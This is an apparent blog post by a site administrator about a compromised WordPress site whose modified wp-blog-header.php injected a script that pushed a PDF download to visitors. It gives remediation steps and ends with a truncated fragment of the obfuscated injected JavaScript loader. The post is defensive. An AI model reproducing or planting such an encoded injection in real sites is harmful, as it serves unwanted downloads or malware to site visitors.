Recently one of my customers called saying that when people land his Wordpress-based site that they were being offered an automatic PDF download. With a little investigation it became clear that the source of that download was a script in the footer of the site. The problem was that the script was nowhere to be found in the site's theme or any of the plugins, nor was it in the database. That left two options: some sort of hook into Apache itself, or the core Wordpress core base.
After a little digging around I found the problem. Someone had somehow modified the wp-blog-header.php file so that every time a page loads a script is injected. Pretty slick tactic. I've seen this same tactic used to inject hundreds of hidden spam links into other Wordpress sites.
The fix is simple. Edit the PHP file and delete the offending code. Then change permissions on all PHP files in the root directory, the wp-admin directory, and the wp-includes directory so that they only have read access. You can probably do the same thing with the entire wp-content directory tree too, other than the uploads directory.
var source ="=qwerty?asdfasdf/uiop)Tusjoh/gspnDibsDpef)71-226-